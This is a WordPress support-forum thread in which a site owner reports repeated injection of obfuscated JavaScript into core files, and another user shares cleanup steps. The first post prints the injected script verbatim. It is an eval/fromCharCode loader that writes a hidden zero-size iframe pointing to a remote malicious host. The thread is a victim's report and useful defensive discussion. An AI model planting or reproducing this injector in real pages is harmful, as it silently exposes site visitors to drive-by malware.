WordPress 2.3.3 HACKED

  • Last week my site was hacked. Multiple wordpress files had the following code appended at the very end:

    <script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C101%2C97%2C45%2C100%2C118%2C46%2C114%2C117%2C47%2C116%2C100%2C115%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>

    This was in many wp-*.php files. I wiped my entire websites http root and installed the latest version of WP (2.3.3) since I was running an older version and I knew there were security fixes. I thought I was covered, until last night the same exact exploit was performed on my site. Again, this is a 100% clean 2.3.3 installation. I’m 99% confident this has nothing to do with a password hack or any type of internal access since the js code is haphazardly appended to the end of various files. The only way I even noticed this “hack” is because the code invalidates/breaks my rss feed.

    I found one prior instance of this hack on this board, and it was with an older version of wordpress. I have NOTHING else installed on this site, wordpress 2.3.3 is the only files in my http root. The ONLY plugins I have installed or even on the server are Askimet and Feed Locations.

    Aside from changing my passwords (which I’m certain will not close this loophole), is there any way to prevent this from happening?

Viewing 16 replies (of 16 total)
  • benfitts

    (@benfitts)

    I got the same report from my web host. Someone was reporting JS/Downloader-AUD on one of our blogs.

    The blog was running an older WordPress 2.1.3 version.

    Like AldebaranJill the hacker was able to append their javascript onto the end of the header for my WordPress theme.

    For you reference it had a comment which made me think it was for a stats package, but I knew we were using Google Analytics so I knew this code was probably the offender. It also used some javascript to try and encode the iframe caused by the AUD trojan.

    Here is what I did to fix it:
    I upgraded wordpress to 2.3.3
    I removed the offending javascript code
    I temporarily changed permissions on my theme to 644. (when we make theme changes in the future we’ll change the permissions back.)

    I hope this helps others who have had the same problem.
    – Ben Fitts

Viewing 16 replies (of 16 total)
  • The topic ‘WordPress 2.3.3 HACKED’ is closed to new replies.